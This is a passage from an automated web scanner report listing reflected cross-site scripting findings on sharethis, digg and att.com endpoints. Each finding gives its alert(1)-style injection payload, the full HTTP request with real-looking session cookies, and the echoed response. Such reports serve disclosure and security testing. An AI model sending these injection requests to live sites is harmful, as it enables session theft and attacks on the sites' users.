Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 10:03:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 145

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/tweetmyjobs.co\/bc364<img src=a onerror=alert(1)>6f637796d71m\/"});

3.715. http://wd.sharethis.com/api/getCount2.php [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 9d290<img%20src%3da%20onerror%3dalert(1)>fb8c65da8a was submitted in the url parameter. This input was echoed as 9d290<img src=a onerror=alert(1)>fb8c65da8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Ftweetmyjobs.com%2F9d290<img%20src%3da%20onerror%3dalert(1)>fb8c65da8a HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tweetmyjobs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 10:03:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 142

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/tweetmyjobs.com\/9d290<img src=a onerror=alert(1)>fb8c65da8a"});

3.716. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 2c304<script>alert(1)</script>b81820ab94 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/27/dork/controlhostexcellencecom/http-header-injection-expect-script-embedded-http-header-javascript-cwe113-ghdb-example-poc-report.html2c304<script>alert(1)</script>b81820ab94 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/27/dork/controlhostexcellencecom/http-header-injection-expect-script-embedded-http-header-javascript-cwe113-ghdb-example-poc-report.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 27 Apr 2011 21:01:41 GMT
Via: NS-CACHE: 100
Etag: "4a1af2deb0d9bb8db10cf48f6fb77b6a619bd724"
Content-Length: 242
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Wed, 27 Apr 2011 21:11:40 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/27/dork/controlhostexcellencecom/http-header-injection-expect-script-embedded-http-header-javascript-cwe113-ghdb-example-poc-report.html2c304<script>alert(1)</script>b81820ab94", "diggs": 0});

3.717. https://www.att.com/olam/a [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed8"><img%20src%3da%20onerror%3dalert(1)>eec0d5667c6 was submitted in the REST URL parameter 2. This input was echoed as 4fed8"><img src=a onerror=alert(1)>eec0d5667c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/a4fed8"><img%20src%3da%20onerror%3dalert(1)>eec0d5667c6 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecuted4776%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E308930536fd?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FregistrationAction.olamexecute%22%2C%22pv%22%3A4%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D; TLTHID=5893ADCE7126107198F1EED8C4C046B3; EDOCSSESSIONID=2FJ8N4nZNcBJz7zWkb4nGfTymqd6f1GdMLvSJZDxbFZfFfGDYwgC!725500378

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9076
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:35:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=0FABE03071271071BAF29E552188C3F4; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=NpT7N4yMShNHyYhgQQQC2QBfgGLhjP7kgC8GSWyvpPW3fX2KkLv6!-744530585; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/a4fed8"><img src=a onerror=alert(1)>eec0d5667c6">
...[SNIP]...

3.718. https://www.att.com/olam/js/cookie.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cookie.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57233"><img%20src%3da%20onerror%3dalert(1)>f6eb79beca9 was submitted in the REST URL parameter 2. This input was echoed as 57233"><img src=a onerror=alert(1)>f6eb79beca9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js57233"><img%20src%3da%20onerror%3dalert(1)>f6eb79beca9/cookie.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js57233"><img src=a onerror=alert(1)>f6eb79beca9/cookie.js">
...[SNIP]...

3.719. https://www.att.com/olam/js/cookie.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cookie.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02ed"><img%20src%3da%20onerror%3dalert(1)>ee81a26d9d4 was submitted in the REST URL parameter 3. This input was echoed as f02ed"><img src=a onerror=alert(1)>ee81a26d9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/cookie.jsf02ed"><img%20src%3da%20onerror%3dalert(1)>ee81a26d9d4 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:41 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA8770F87125107197929E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/cookie.jsf02ed"><img src=a onerror=alert(1)>ee81a26d9d4">
...[SNIP]...

3.720. https://www.att.com/olam/js/flash.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/flash.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548c4"><img%20src%3da%20onerror%3dalert(1)>e6d09755fe5 was submitted in the REST URL parameter 2. This input was echoed as 548c4"><img src=a onerror=alert(1)>e6d09755fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js548c4"><img%20src%3da%20onerror%3dalert(1)>e6d09755fe5/flash.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js548c4"><img src=a onerror=alert(1)>e6d09755fe5/flash.js">
...[SNIP]...

3.721. https://www.att.com/olam/js/flash.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/flash.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad5b"><img%20src%3da%20onerror%3dalert(1)>aaa1390615f was submitted in the REST URL parameter 3. This input was echoed as aad5b"><img src=a onerror=alert(1)>aaa1390615f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/flash.jsaad5b"><img%20src%3da%20onerror%3dalert(1)>aaa1390615f HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA6B03647125107197909E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/flash.jsaad5b"><img src=a onerror=alert(1)>aaa1390615f">
...[SNIP]...

3.722. https://www.att.com/olam/js/posUtil.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/posUtil.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4874"><img%20src%3da%20onerror%3dalert(1)>d5d0d3e26ba was submitted in the REST URL parameter 2. This input was echoed as c4874"><img src=a onerror=alert(1)>d5d0d3e26ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsc4874"><img%20src%3da%20onerror%3dalert(1)>d5d0d3e26ba/posUtil.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:34 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsc4874"><img src=a onerror=alert(1)>d5d0d3e26ba/posUtil.js">
...[SNIP]...

3.723. https://www.att.com/olam/js/posUtil.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/posUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b568f"><img%20src%3da%20onerror%3dalert(1)>4c096ab377d was submitted in the REST URL parameter 3. This input was echoed as b568f"><img src=a onerror=alert(1)>4c096ab377d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/posUtil.jsb568f"><img%20src%3da%20onerror%3dalert(1)>4c096ab377d HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
